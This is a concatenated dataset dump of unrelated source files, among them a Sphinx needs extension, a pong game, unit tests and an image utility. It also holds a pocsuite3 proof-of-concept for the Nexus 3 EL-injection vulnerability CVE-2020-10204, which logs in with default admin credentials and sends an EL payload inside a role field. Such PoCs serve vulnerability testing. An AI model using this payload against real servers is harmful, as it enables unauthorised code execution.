sphinx run may be active, which has registered a directive,\n # which is reused inside a current document, but no type was defined for the current run...\n # Yeah, this really has happened...\n return [nodes.Text('', '')]\n\n # Get the id or generate a random string/hash string, which is hopefully unique\n # TODO: Check, if id was already given. If True, recalculate id\n # id = self.options.get(\"id\", ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for\n # _ in range(5)))\n if id is None and env.app.config.needs_id_required:\n raise NeedsNoIdException(\"An id is missing for this need and must be set, because 'needs_id_required' \"\n \"is set to True in conf.py. 
Need '{}' in {} ({})\".format(title, docname, lineno))\n\n if id is None:\n need_id = make_hashed_id(app, need_type, title, content)\n else:\n need_id = id\n\n if env.app.config.needs_id_regex and not re.match(env.app.config.needs_id_regex, need_id):\n raise NeedsInvalidException(\"Given ID '{id}' does not match configured regex '{regex}'\".format(\n id=need_id, regex=env.app.config.needs_id_regex))\n\n #print (\"create need: \", need_id, id)\n # Calculate target id, to be able to set a link back\n target_node = nodes.target('', '', ids=[need_id])\n #print (target_node)\n\n # Removed 0.5.0\n # if collapse is None:\n # collapse = getattr(env.app.config, \"needs_collapse_details\", True)\n\n # Handle status\n # Check if status is in needs_statuses. If not raise an error.\n if env.app.config.needs_statuses:\n if status not in [stat[\"name\"] for stat in env.app.config.needs_statuses]:\n raise NeedsStatusNotAllowed(\"Status {0} of need id {1} is not allowed \"\n \"by config value 'needs_statuses'.\".format(status, need_id))\n\n if tags is None:\n tags = []\n if len(tags) > 0:\n tags = [tag.strip() for tag in re.split(\";|,\", tags)]\n for i in range(len(tags)):\n if len(tags[i]) == 0 or tags[i].isspace():\n del (tags[i])\n logger.warning('Scruffy tag definition found in need {}. '\n 'Defined tag contains spaces only.'.format(need_id))\n\n # Check if tag is in needs_tags. If not raise an error.\n if env.app.config.needs_tags:\n for tag in tags:\n if tag not in [tag[\"name\"] for tag in env.app.config.needs_tags]:\n raise NeedsTagNotAllowed(\"Tag {0} of need id {1} is not allowed \"\n \"by config value 'needs_tags'.\".format(tag, need_id))\n # This may have cut also dynamic function strings, as they can contain , as well.\n # So let put them together again\n # ToDo: There may be a smart regex for the splitting. This would avoid this mess of code...\n tags = _fix_list_dyn_func(tags)\n\n #############################################################################################\n # Add need to global need list\n #############################################################################################\n # be sure, global var is available. If not, create it\n if not hasattr(env, 'needs_all_needs'):\n env.needs_all_needs = {}\n\n if need_id in env.needs_all_needs.keys():\n if id is not None:\n raise NeedsDuplicatedId(\"A need with ID {} already exists! \"\n \"This is not allowed. Document {}[{}] Title: {}.\".format(need_id, docname, lineno, title))\n else: # this is a generated ID\n raise NeedsDuplicatedId(\n \"Needs could not generate a unique ID for a need with \"\n \"the title '{}' because another need had the same title. \"\n \"Either supply IDs for the requirements or ensure the \"\n \"titles are different. 
NOTE: If title is being generated \"\n \"from the content, then ensure the first sentence of the \"\n \"requirements are different.\".format(' '.join(title)))\n\n # Trim title if it is too long\n max_length = getattr(env.app.config, 'needs_max_title_length', 30)\n if max_length == -1 or len(title) <= max_length:\n trimmed_title = title\n elif max_length <= 3:\n trimmed_title = title[:max_length]\n else:\n trimmed_title = title[:max_length - 3] + '...'\n\n # Add the need and all needed information\n needs_info = {\n 'docname': docname,\n 'lineno': lineno,\n 'target_node': target_node,\n 'content_node': None, # gets set after rst parsing\n 'type': need_type,\n 'type_name': type_name,\n 'type_prefix': type_prefix,\n 'type_color': type_color,\n 'type_style': type_style,\n 'status': status,\n 'tags': tags,\n 'id': need_id,\n 'title': trimmed_title,\n 'full_title': title,\n 'content': content,\n 'collapse': collapse,\n 'style': style,\n 'layout': layout,\n 'template': template,\n 'pre_template': pre_template,\n 'post_template': post_template,\n 'hide': hide,\n 'parts': {},\n\n 'is_part': False,\n 'is_need': True\n }\n #print (needs_info)\n needs_extra_options = env.config.needs_extra_options.keys()\n _merge_extra_options(needs_info, kwargs, needs_extra_options)\n\n needs_global_options = env.config.needs_global_options\n _merge_global_options(needs_info, needs_global_options)\n\n link_names = [x['option'] for x in env.config.needs_extra_links]\n for keyword in kwargs:\n if keyword not in needs_extra_options and keyword not in link_names:\n raise NeedsInvalidOption('Unknown Option {}. '\n 'Use needs_extra_options or needs_extra_links in conf.py'\n 'to define this option.'.format(keyword))\n\n # Merge links\n copy_links = []\n\n for link_type in env.config.needs_extra_links:\n # Check, if specific link-type got some arguments during method call\n if link_type['option'] not in list(kwargs.keys()) and link_type['option'] not in needs_global_options.keys():\n # if not we set no links, but entry in needS_info must be there\n links = []\n elif link_type['option'] in needs_global_options.keys() and \\\n (link_type['option'] not in list(kwargs.keys()) or len(str( kwargs[link_type['option']])) == 0):\n # If it is in global option, value got already set during prior handling of them\n links_string = needs_info[link_type['option']]\n links = _read_in_links(links_string)\n else:\n # if it is set in kwargs, take this value and maybe override set value from global_options\n links_string = kwargs[link_type['option']]\n links = _read_in_links(links_string)\n\n needs_info[link_type[\"option\"]] = links\n needs_info['{}_back'.format(link_type[\"option\"])] = set()\n\n if 'copy' not in link_type.keys():\n link_type['copy'] = False\n\n if link_type['copy'] and link_type['option'] != 'links':\n copy_links += links # Save extra links for main-links\n\n needs_info['links'] += copy_links # Set copied links to main-links\n\n env.needs_all_needs[need_id] = needs_info\n\n # Template builds\n ##############################\n\n # template\n if needs_info['template'] is not None and len(needs_info['template']) > 0:\n new_content = _prepare_template(app, needs_info, 'template')\n # Overwrite current content\n content = new_content\n needs_info['content'] = new_content\n else:\n new_content = None\n\n # pre_template\n if needs_info['pre_template'] is not None and len(needs_info['pre_template']) > 0:\n pre_content = _prepare_template(app, needs_info, 'pre_template')\n needs_info['pre_content'] = pre_content\n else:\n pre_content 
= None\n\n # post_template\n if needs_info['post_template'] is not None and len(needs_info['post_template']) > 0:\n post_content = _prepare_template(app, needs_info, 'post_template')\n needs_info['post_content'] = post_content\n else:\n post_content = None\n\n if needs_info['hide']:\n return [target_node]\n\n # Adding of basic Need node.\n ############################\n # Title and meta data information gets added alter during event handling via process_need_nodes()\n # We just add a basic need node and render the rst-based content, because this can not be done later.\n # style_classes = ['need', type_name, 'need-{}'.format(type_name.lower())] # Used < 0.4.4\n style_classes = ['need', 'need-{}'.format(need_type.lower())]\n if style is not None and style != '':\n style_classes.append(style)\n\n node_need = sphinxcontrib.needs.directives.need.Need(\n '', classes=style_classes, ids=[need_id])\n\n # Render rst-based content and add it to the need-node\n\n node_need_content = _render_template(content, docname, lineno, state)\n need_parts = find_parts(node_need_content)\n update_need_with_parts(env, needs_info, need_parts)\n\n node_need += node_need_content.children\n\n needs_info['content_node'] = node_need\n #print(\"target_node: \", target_node)\n #print(\"node_need: \", node_need)\n #needs_info['content_node']['id'] = need_id\n\n return_nodes = [target_node] + [node_need]\n if pre_content is not None:\n node_need_pre_content = _render_template(pre_content, docname, lineno, state)\n pre_container = nodes.container()\n pre_container += node_need_pre_content.children\n return_nodes = [pre_container] + return_nodes\n\n if post_content is not None:\n node_need_post_content = _render_template(post_content, docname, lineno, state)\n post_container = nodes.container()\n post_container += node_need_post_content.children\n return_nodes = return_nodes + [post_container]\n\n \n return return_nodes\n\n\ndef _prepare_template(app, needs_info, template_key):\n template_folder = app.config.needs_template_folder\n if not os.path.isabs(template_folder):\n template_folder = os.path.join(app.confdir, template_folder)\n\n if not os.path.isdir(template_folder):\n raise NeedsTemplateException('Template folder does not exist: {}'.format(template_folder))\n\n template_file_name = needs_info[template_key] + '.need'\n template_path = os.path.join(template_folder, template_file_name)\n if not os.path.isfile(template_path):\n raise NeedsTemplateException('Template does not exist: {}'.format(template_path))\n\n with open(template_path, 'r') as template_file:\n template_content = ''.join(template_file.readlines())\n template_obj = Template(template_content)\n new_content = template_obj.render(**needs_info)\n\n return new_content\n\n\ndef _render_template(content, docname, lineno, state):\n rst = ViewList()\n for line in content.split('\\n'):\n rst.append(line, docname, lineno)\n node_need_content = nodes.Element()\n node_need_content.document = state.document\n nested_parse_with_titles(state, rst, node_need_content)\n return node_need_content\n\n\n\ndef _read_in_links(links_string):\n # Get links\n links = []\n if len(links_string) > 0:\n for link in re.split(\";|,\", links_string):\n if not link.isspace():\n links.append(link.strip())\n else:\n logger.warning('Grubby link definition found in need {}. 
'\n 'Defined link contains spaces only.'.format(id))\n\n # This may have cut also dynamic function strings, as they can contain , as well.\n # So let put them together again\n # ToDo: There may be a smart regex for the splitting. This would avoid this mess of code...\n return _fix_list_dyn_func(links)\n\n\ndef make_hashed_id(app, need_type, full_title, content, id_length=None):\n \"\"\"\n Creates an ID based on title or need.\n\n Also cares about the correct prefix, which is specified for each need type.\n\n :param app: Sphinx application object\n :param need_type: name of the need directive, e.g. req\n :param full_title: full title of the need\n :param content: content of the need\n :param id_length: maximum length of the generated ID\n :return: ID as string\n \"\"\"\n types = app.config.needs_types\n if id_length is None:\n id_length = app.config.needs_id_length\n type_prefix = None\n for ntype in types:\n if ntype[\"directive\"] == need_type:\n type_prefix = ntype[\"prefix\"]\n break\n if type_prefix is None:\n raise NeedsInvalidException('Given need_type {} is unknown. File {}'.format(need_type, app.env.docname))\n\n hashable_content = full_title or '\\n'.join(content)\n return \"%s%s\" % (type_prefix,\n hashlib.sha1(hashable_content.encode(\"UTF-8\"))\n .hexdigest()\n .upper()[:id_length])\n\n\ndef _fix_list_dyn_func(list):\n \"\"\"\n This searches a list for dynamic function fragments, which may have been cut by generic searches for \",|;\".\n\n Example:\n `link_a, [[copy('links', need_id)]]` this will be splitted in list of 3 parts:\n\n #. link_a\n #. [[copy('links'\n #. need_id)]]\n\n This function fixes the above list to the following:\n\n #. link_a\n #. [[copy('links', need_id)]]\n\n :param list: list which may contain splitted function calls\n :return: list of fixed elements\n \"\"\"\n open_func_string = False\n new_list = []\n for element in list:\n # If dyn_func got not cut, just add it\n if '[[' in element and ']]' in element:\n new_list.append(element)\n # Other check if this is the starting element of dyn function\n elif '[[' in element:\n open_func_string = True\n new_link = [element]\n # Check if this is the ending element if dyn function\n elif ']]' in element:\n new_link.append(element)\n open_func_string = False\n element = \",\".join(new_link)\n new_list.append(element)\n # Check it is a \"middle\" part of the dyn function\n elif open_func_string:\n new_link.append(element)\n # Looks like it isn't a cut dyn_func, just add.\n else:\n new_list.append(element)\n return new_list\n\n\ndef _merge_extra_options(needs_info, needs_kwargs, needs_extra_options):\n \"\"\"Add any extra options introduced via options_ext to needs_info\"\"\"\n extra_keys = set(needs_kwargs.keys()).difference(set(needs_info.keys()))\n\n for key in needs_extra_options:\n if key in extra_keys:\n needs_info[key] = str(needs_kwargs[key])\n elif key not in needs_info.keys():\n # Finally add all not used extra options with empty value to need_info.\n # Needed for filters, which need to access these empty/not used options.\n needs_info[key] = \"\"\n\n return extra_keys\n\n\ndef _merge_global_options(needs_info, global_options):\n \"\"\"Add all global defined options to needs_info\"\"\"\n if global_options is None:\n return\n for key, value in global_options.items():\n\n # If key already exists in needs_info, this global_option got overwritten manually in current need\n if key in needs_info.keys() and needs_info[key] is not None and len(str(needs_info[key])) > 0:\n continue\n\n if isinstance(value, tuple):\n 
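# (added note) a tuple-valued global option is conditional:\n            # (value, filter_string) or (value, filter_string, default)\n            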
values = [value]\n        elif isinstance(value, list):\n            values = value\n        else:\n            needs_info[key] = value\n            continue\n\n        for single_value in values:\n            if len(single_value) < 2 or len(single_value) > 3:\n                raise NeedsInvalidException('global option tuple has wrong amount of parameters: {}'.format(key))\n            if filter_single_need(needs_info, single_value[1]):\n                # Set value, if filter has matched\n                needs_info[key] = single_value[0]\n            elif len(single_value) == 3 and (key not in needs_info.keys() or len(str(needs_info[key])) > 0):\n                # Otherwise set default, but only if no value was set before or value is \"\" and a default is defined\n                needs_info[key] = single_value[2]\n            else:\n                # If no value was set until now, we have to set an empty value, so that we are sure that each need\n                # has at least the key.\n                if key not in needs_info.keys():\n                    needs_info[key] = ''\n\n\n","sub_path":"sphinxcontrib/needs/api/need.py","file_name":"need.py","file_ext":"py","file_size_in_byte":21136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"128720589","text":"# this is a comment\nimport pgzrun\nfrom random import randint, choice\n\n\nclass Paletka:\n    def __init__(self, paletka, pozycja):\n        self.paletka = paletka\n        self.paletka.x = pozycja[0]\n        self.paletka.y = pozycja[1]\n\n    def drawing(self):\n        self.paletka.draw()\n\n    def move(self, direction):\n        if direction == \"left\":\n            self.paletka.x -= 5\n        elif direction == \"right\":\n            self.paletka.x += 5\n\n    def bounce(self):\n        # such a simple distance check is not enough on its own\n        return self.paletka.distance_to(ball) < 60\n\n\n\n\ndef aktualizuj_pozycje_paletek():\n    if keyboard.a:\n        paletka_a.move(\"left\")\n    if keyboard.s:\n        paletka_a.move(\"right\")\n    if keyboard.k:\n        paletka_b.move(\"left\")\n    if keyboard.l:\n        paletka_b.move(\"right\")\n\ndef update_ball_position():\n    if ball.direction_x == \"left\":\n        ball.x -= ball.speed\n    elif ball.direction_x == \"right\":\n        ball.x += ball.speed\n\n    if ball.direction_y == \"up\":\n        ball.y -= ball.speed\n    elif ball.direction_y == \"down\":\n        ball.y += ball.speed\n\n    if ball.x < 5:\n        ball.direction_x = \"right\"\n    elif ball.x > WIDTH - 5:\n        ball.direction_x = \"left\"\n\n    if ball.y < 5:\n        ball.winner = \"PLAYER B\"\n        ball.stop = True\n        ball.game_run = False\n    elif ball.y > HEIGHT - 5:\n        ball.winner = \"PLAYER A\"\n        ball.stop = True\n        ball.game_run = False\n\ndef sprawdz_czy_odbijemy():\n    if paletka_a.bounce():\n        ball.direction_y = \"down\"\n    if paletka_b.bounce():\n        ball.direction_y = \"up\"\n\n\nWIDTH = 1280\nHEIGHT = 853\n\npaletka_a = Paletka(Actor(\"palette.png\"), (100, 20))\npaletka_b = Paletka(Actor(\"palette.png\"), (100, 830))\n\nball = Actor(\"ball.png\")\nball.x = randint(40, WIDTH - 40)\nball.y = HEIGHT // 2\n\n# add our custom attributes\nball.start = False\nball.game_run = False\nball.stop = False\nball.winner = None\nball.direction_x = choice((\"left\", \"right\"))\nball.direction_y = choice((\"up\", \"down\"))\nball.speed = 2\n\ndef draw():\n    screen.blit(\"desert-1654439_1280.jpg\", (0, 0))\n    if not ball.start:\n        screen.draw.text(\n            \"Press SPACE to start.\", (40, 150), fontsize=40, color=(0, 0, 0)\n        )\n    paletka_a.drawing()\n    paletka_b.drawing()\n    ball.draw()\n\ndef update():\n    if not ball.start and keyboard.space:\n        ball.game_run = True\n        ball.start = True\n    if ball.game_run:\n        update_ball_position()\n        aktualizuj_pozycje_paletek()\n        
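# (added) finally check whether either paddle should bounce the ball this frame\n        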
sprawdz_czy_odbijemy()\n\npgzrun.go()\n","sub_path":"project-simple-03.py","file_name":"project-simple-03.py","file_ext":"py","file_size_in_byte":2535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"621487624","text":"import pytest\n\nimport determined as det\n\n\ndef test_list_to_dict() -> None:\n    r = det.util._list_to_dict([{\"a\": 1}, {\"b\": 2}, {\"a\": 2}])\n    assert r == {\"a\": [1, 2], \"b\": [2]}\n\n\ndef test_dict_to_list() -> None:\n    r = det.util._dict_to_list({\"a\": [1, 2], \"b\": [3, 4]})\n    assert r == [{\"a\": 1, \"b\": 3}, {\"a\": 2, \"b\": 4}]\n\n\ndef test_sizeof_fmt() -> None:\n    assert det.common.util.sizeof_fmt(1024) == \"1.0KB\"\n    assert det.common.util.sizeof_fmt(36) == \"36.0B\"\n\n\ndef test_calculate_batch_sizes() -> None:\n    # Valid cases.\n    psbs, gbs = det.util.calculate_batch_sizes({\"global_batch_size\": 1}, 1, \"Trial\")\n    assert (psbs, gbs) == (1, 1)\n    psbs, gbs = det.util.calculate_batch_sizes({\"global_batch_size\": 8}, 2, \"Trial\")\n    assert (psbs, gbs) == (4, 8)\n\n    # Missing global_batch_size.\n    with pytest.raises(det.errors.InvalidExperimentException, match=\"is a required hyperparameter\"):\n        det.util.calculate_batch_sizes({}, 1, \"Trial\")\n\n    # Invalid global_batch_size.\n    for x in [\"1\", 32.0]:\n        with pytest.raises(det.errors.InvalidExperimentException, match=\"must be an integer value\"):\n            det.util.calculate_batch_sizes({\"global_batch_size\": x}, 1, \"Trial\")\n\n    # global_batch_size too small.\n    with pytest.raises(det.errors.InvalidExperimentException, match=\"to be greater or equal\"):\n        det.util.calculate_batch_sizes({\"global_batch_size\": 1}, 2, \"Trial\")\n","sub_path":"harness/tests/test_util.py","file_name":"test_util.py","file_ext":"py","file_size_in_byte":1405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"51960031","text":"#!/usr/bin/env python\r\n#coding=utf-8\r\n\r\nimport random\r\nimport json\r\nimport base64\r\n\r\nfrom pocsuite3.api import requests as req\r\nfrom pocsuite3.api import register_poc\r\nfrom pocsuite3.api import Output, POCBase\r\nfrom pocsuite3.api import POC_CATEGORY, VUL_TYPE\r\n\r\n'''\r\nCVE-2020-10204: Nexus 3 EL injection\r\nAdmin access is required\r\n'''\r\nclass Nexus3_2020_10204_EL_INJECTION_POC(POCBase):\r\n    vulID = 'Nexus3-CVE-2020-10204'\r\n    appName = 'Nexus3'\r\n    appVersion = 'Nexus Repository Manager OSS/Pro <=3.21.1'\r\n    category = POC_CATEGORY.EXPLOITS.REMOTE\r\n    vulType = VUL_TYPE.CODE_EXECUTION\r\n    vulDate = '2020-04-01' # date the vulnerability went public; use today's date if unknown\r\n    author = 'shadowsock5' # PoC author\r\n    createDate = '2020-04-03' # date the PoC was written\r\n    updateDate = '2020-04-03' # date the PoC was last updated; defaults to the creation date\r\n    references = ['https://support.sonatype.com/hc/en-us/articles/360044356194-CVE-2020-10204-Nexus-Repository-Manager-3-Remote-Code-Execution-2020-03-31'] # source describing the vulnerability; leave empty for 0-days\r\n    name = 'Nexus3 EL injection' # PoC name\r\n    install_requires = [] # third-party module dependencies of the PoC; avoid third-party modules where possible, and see the PoC dependency guide when they are needed\r\n    cvss = u\"medium\"\r\n\r\n    # use two random numbers as a marker; their product is computed here and checked in the response later\r\n    ran1 = random.randint(1,100)\r\n\r\n    ran2 = random.randint(100,200)\r\n\r\n    ran_sum = ran1 * ran2\r\n\r\n    http_proxy = \"http://192.168.85.1:8087\"\r\n    https_proxy = \"http://192.168.85.1:8087\"\r\n    proxies = {\"http\": http_proxy, \"https\": https_proxy}\r\n\r\n\r\n    def _verify(self):\r\n        result={}\r\n\r\n        vul_url = self.url\r\n\r\n        target_url = vul_url + \"/service/extdirect\"\r\n\r\n        j = {\r\n            \"action\":\"coreui_User\",\r\n            \"method\":\"create\",\r\n            \"data\": [\r\n                
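# (added) the role below embeds the EL expression {ran1*ran2}; if the server\r\n                # evaluates it, the error response echoes the product checked in test_EL\r\n                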
{\r\n                    \"userId\": \"shadowsock5\",\r\n                    \"firstName\": \"77\",\r\n                    \"lastName\": \"ss\",\r\n                    \"password\": \"password\",\r\n                    \"email\": \"77@qq.com\",\r\n                    \"status\": \"active\",\r\n                    \"roles\": [\r\n                        \"$\\\\A\" + \"{\" + str(self.ran1) + \"*\" + str(self.ran2) + \"}\"\r\n                    ]\r\n                }\r\n            ],\r\n            \"type\":\"rpc\",\"tid\":4}\r\n\r\n        try:\r\n            self.headers.update(self.auth())\r\n            print(self.headers)\r\n            resp = req.post(target_url, json=j, headers=self.headers, proxies=self.proxies)\r\n        except Exception as e:\r\n            print(e)\r\n\r\n        if self.test_EL(resp):\r\n            result['VerifyInfo'] = {}\r\n            result['VerifyInfo']['URL'] = target_url\r\n            return self.save_output(result)\r\n        return self.save_output(result)\r\n\r\n\r\n\r\n    def auth(self):\r\n        user = \"admin\"\r\n        password = \"admin123\"\r\n        tmp = user + ':' + password\r\n        auth = base64.b64encode(tmp.encode('ascii')).decode(\"utf-8\")\r\n        headers = {'Authorization': 'Basic' + ' ' + auth}\r\n        return headers\r\n\r\n\r\n\r\n    # verify that the EL expression was evaluated\r\n    def test_EL(self, p_resp):\r\n        d = p_resp.json()\r\n        result = d['result']['errors']['roles']\r\n        print(result)\r\n        print(self.ran_sum)\r\n        try:\r\n            if str(self.ran_sum) in result:\r\n                return True\r\n        except Exception:\r\n            return False\r\n\r\n    # attack mode\r\n    def _attack(self):\r\n        return self._verify()\r\n\r\n    # report the result\r\n    def save_output(self, result):\r\n        output = Output(self)\r\n        if result:\r\n            output.success(result)\r\n        else:\r\n            output.fail()\r\n        return output\r\n\r\nregister_poc(Nexus3_2020_10204_EL_INJECTION_POC)\r\n","sub_path":"nexes-manager/CVE-2020-10204.py","file_name":"CVE-2020-10204.py","file_ext":"py","file_size_in_byte":3847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"1110209","text":"\n# encoding : https://www.youtube.com/watch?v=MwqDZb0QEl0&index=18&list=PLUujJDuOx6BIsByGjnCAum1do3erXsl81\n\nfile_name = 'test.txt'\n\ndef create_file():\n    f = open(file_name, mode='w')\n    for x in range(1,21):\n        f.write(str(x) + '\\n')\n    f.close()\n\ndef open_file():\n    f = None\n    try:\n        f = open(file_name, mode='r')\n        t = f.read()\n        print(t)\n    except FileNotFoundError:\n        print('File not found: %s' % file_name)\n    finally:\n        if f:\n            f.close()\n\ncreate_file()\nopen_file()\n","sub_path":"syntax/file/file_example.py","file_name":"file_example.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"49671836","text":"#-*- coding: utf-8 -*-\nimport os\nimport Image\nfrom django.conf import settings\n\ndef get_thumbnail_filename(filepath, size, crop=False):\n    if isinstance(size, tuple):\n        size = '%dx%d' % size[:2]\n    filehead, filetail = os.path.split(filepath)\n    basename, format = os.path.splitext(filetail)\n    miniature = basename + '_' + size + ('c' if crop else '') + format\n\n    return miniature\n\n# modified snippet from djangosnippets.org\ndef create_thumbnail(file, size=settings.THUMBNAILS_SIZE, miniature_subdir=settings.THUMBNAILS_SUBDIR, crop=False):\n    if isinstance(size, tuple):\n        x, y = size[:2]\n    elif isinstance(size, basestring):\n        x, y = [float(x) for x in size.split('x')]\n    # getting miniature name\n    miniature = get_thumbnail_filename(file.path, size, crop)\n    # getting miniature url\n    filehead, filetail = os.path.split(file.url)\n    filehead = os.path.join(filehead, miniature_subdir)\n    miniature_url = filehead + '/' + miniature\n    # getting miniature filename\n    filehead2, filetail2 = os.path.split(file.path)\n    filehead2 = os.path.join(filehead2, miniature_subdir)\n    miniature_filename 
= os.path.join(filehead2, miniature)\n if os.path.exists(miniature_filename) and os.path.getmtime(file.path)>os.path.getmtime(miniature_filename):\n os.unlink(miniature_filename)\n # if miniature subdir does ot exist, create it\n subdir, fn = os.path.split(file.path)\n p = os.path.join(subdir,miniature_subdir)\n if not os.path.exists(p):\n os.mkdir(p)\n i = open(os.path.join(p,\"index.html\"),\"w\")\n i.close()\n # if the image wasn't already resized, resize it\n if not os.path.exists(miniature_filename):\n image = Image.open(file.path)\n if crop:\n cx,cy = image.size\n s = min(cx/x,cy/y)\n nx,ny = int(s*x),int(s*y)\n ox,oy = int((cx-nx)/2),int((cy-ny)/2)\n box = (ox,oy,ox+nx,oy+ny)\n image = image.crop(box)\n image.thumbnail([int(x), int(y)], Image.ANTIALIAS)\n try:\n image.save(miniature_filename, image.format, quality=90, optimize=1)\n except:\n image.save(miniature_filename, image.format, quality=90)\n\n return miniature_url\n","sub_path":"thumbnails/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"475396943","text":"from codes import cfg\nfrom torch.autograd import Variable\nfrom torchvision.utils import save_image\nfrom matplotlib import pyplot as plt\n\nfrom data.train_dataset import train_dataset\nimport utils.loss as ls\nfrom utils import metric as mc\nfrom utils.utils import *\n\nimport os\nimport cv2\n\nimport torch\nimport numpy as np\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = '2'\ncuda = True if torch.cuda.is_available() else False\n\n\ndef various_distance(out_vec_t0, out_vec_t1, dist_flag):\n if dist_flag == 'l2':\n distance = F.pairwise_distance(out_vec_t0, out_vec_t1, p=2)\n if dist_flag == 'l1':\n distance = F.pairwise_distance(out_vec_t0, out_vec_t1, p=1)\n if dist_flag == 'cos':\n distance = 1 - F.cosine_similarity(out_vec_t0, out_vec_t1)\n return distance\n\ndef single_layer_heatmap_visual(output_t0, output_t1, save_change_map_dir, filename, layer_flag, dist_flag, idx):\n n, c, h, w = output_t0.data.shape\n out_t0_rz = torch.transpose(output_t0.view(c, h * w), 1, 0)\n out_t1_rz = torch.transpose(output_t1.view(c, h * w), 1, 0)\n distance = various_distance(out_t0_rz, out_t1_rz, dist_flag)\n distance = (distance > 1.0).float()\n similar_distance_map = distance.view(h, w).data.cpu().numpy()\n similar_distance_map_rz = Variable(torch.from_numpy(similar_distance_map[np.newaxis, np.newaxis, :]))\n if idx % 10 == 0:\n similar_dis_map_colorize = cv2.applyColorMap(np.uint8(255 * similar_distance_map_rz[0][0].cpu()),\n cv2.COLORMAP_BONE)\n save_change_map_dir_layer = os.path.join(save_change_map_dir, layer_flag)\n check_dir(save_change_map_dir_layer)\n change_map_dir = os.path.join(save_change_map_dir_layer, filename + '.jpg')\n cv2.imwrite(change_map_dir, similar_dis_map_colorize)\n return similar_distance_map_rz.data.cpu().numpy()\n\ndef validate(net_CD, val_dataloader, epoch, save_change_map_dir, save_roc_dir):\n net_CD.eval()\n cont_conv_total, total_count = 0.0, 0.0\n metric_for_conditions = init_metric_for_class_for_cmu(1)\n\n for idx, batch in enumerate(val_dataloader):\n image1, image2, label, name, height, width = batch\n height, width, name = height.numpy()[0], width.numpy()[0], name[0]\n image1, image2, label = Variable(image1.cuda()), Variable(image2.cuda()), Variable(label.cuda())\n image1_norm, image2_norm, label_norm = image1 / 255.0, image2 / 255.0, label / 255.0\n\n out_conv = 
net_CD(image1, image2)\n out_t0_conv, out_t1_conv = out_conv\n\n conv_distance = single_layer_heatmap_visual(out_t0_conv, out_t1_conv, save_change_map_dir, name, key, 'l2', idx)\n cont_conv = mc.RMS_Contrast(conv_distance)\n\n cont_conv_total += cont_conv\n\n total_count += 1\n\n prob_change = conv_distance[0][0]\n gt = label_norm.data.cpu().numpy()\n FN, FP, posNum, negNum = mc.eval_image_rewrite(gt[0], prob_change, cl_index=1)\n metric_for_conditions[0]['total_fp'] += FP\n metric_for_conditions[0]['total_fn'] += FN\n metric_for_conditions[0]['total_posnum'] += posNum\n metric_for_conditions[0]['total_negnum'] += negNum\n cont_conv_mean = cont_conv_total / total_count\n\n thresh = np.array(range(0,256)) / 255.0\n conds = metric_for_conditions.keys()\n for cond_name in conds:\n total_posnum = metric_for_conditions[cond_name]['total_posnum']\n total_negnum = metric_for_conditions[cond_name]['total_negnum']\n total_fp = metric_for_conditions[cond_name]['total_fp']\n total_fn = metric_for_conditions[cond_name]['total_fn']\n metric_dict = mc.pxEval_maximizeFMeasure(total_posnum,total_negnum, total_fn, total_fp, thresh=thresh)\n metric_for_conditions[cond_name].setdefault('metric', metric_dict)\n metric_for_conditions[cond_name].setdefault('contrast_conv', cont_conv_mean)\n\n\n f_score_total = 0.0\n for cond_name in conds:\n pr, rec, f_score = metric_for_conditions[cond_name]['metric']['precision'], metric_for_conditions[cond_name]['metric']['recall'], metric_for_conditions[cond_name]['metric']['MaxF']\n roc_save_epoch_dir = os.path.join(save_roc_dir, str(epoch))\n check_dir(roc_save_epoch_dir)\n mc.save_PTZ_metric2disk(metric_for_conditions[cond_name], roc_save_epoch_dir)\n roc_save_dir = roc_save_epoch_dir + '_' + str(cond_name) + '_roc.png'\n mc.plotPrecisionRecall(pr, rec, roc_save_dir, benchmark_pr=None)\n f_score_total += f_score\n\n print(f_score_total / (len(conds)))\n return f_score_total/len(conds)\n\n\nif __name__ == '__main__':\n\n datas, trainloader, valloader = train_dataset('CDD', crop_size=cfg.INPUT_SIZE, batch_size=cfg.BATCH_SIZE,\n num_workers=cfg.num_workers)\n\n weights = torch.FloatTensor(datas['weights']).cuda()\n\n import model.BSFNet as models\n\n net_CD = models.SiameseNet()\n criterion_CD = ls.BCL_v2()\n criterion_auxillary = ls.BCLwithUncertainty_v1()\n criterion_iou = ls.IOUloss_v2()\n\n if cuda:\n net_CD.cuda()\n criterion_CD.cuda()\n criterion_auxillary.cuda()\n criterion_iou.cuda()\n\n learning_rate = 1e-4\n optimizer_CD = torch.optim.Adam(net_CD.parameters(), lr=learning_rate, betas=(cfg.b1, cfg.b2))\n\n\n load_checkpoint = torch.load(cfg.SAVE_PATH + '.pth')\n net_CD.load_state_dict(load_checkpoint['net_CD'])\n EPOCH = load_checkpoint['epoch']\n load_best_metric = load_checkpoint['metric']\n print('load_cd_epoch = %d' % (EPOCH))\n start_epoch = EPOCH\n key = 'bsfnet_best'\n\n save_result_path = os.path.join(cfg.SAVE_PATH, 'test')\n check_dir(save_result_path)\n save_image_path = os.path.join(save_result_path, 'imgs')\n check_dir(save_image_path)\n save_roc_path = os.path.join(save_result_path, 'roc')\n check_dir(save_roc_path)\n\n current_metric = validate(net_CD, valloader, start_epoch, save_image_path, save_roc_path)\n\n","sub_path":"cd_code/test code.py","file_name":"test code.py","file_ext":"py","file_size_in_byte":5999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"164870397","text":"import argparse\nimport logging\nimport os\nimport signal\nimport subprocess\nimport tempfile\nfrom urllib import 
